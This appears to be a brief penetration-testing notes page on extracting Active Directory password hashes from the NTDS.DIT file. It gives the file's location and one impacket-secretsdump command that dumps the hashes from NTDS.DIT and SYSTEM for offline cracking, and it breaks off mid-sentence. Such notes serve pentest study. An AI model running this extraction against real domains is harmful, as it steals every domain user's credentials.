NTDS Tom Foolery

Introduction

NTDS, specifically the NTDS.DIT file is not just a file within Active Directory; it is the core of the entire infrustructure. It serves as a centralized repository for all the domain’s objects and their associated information.

NTDS.DIT Location

The NTDS.DIT file is located typically at: C:\Windows\NTDS\Ntds.dit. Though Administrators can specify alternate locations on setup.

Extracting Password Hashes

Once we have located NTDS.DIT & SYSTEM, we can exfiltrate the file back to our host and crack if offline.

Impacket-Secretsdump

kali@kali$ impacket-secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

The only thing left to do is:

Last updated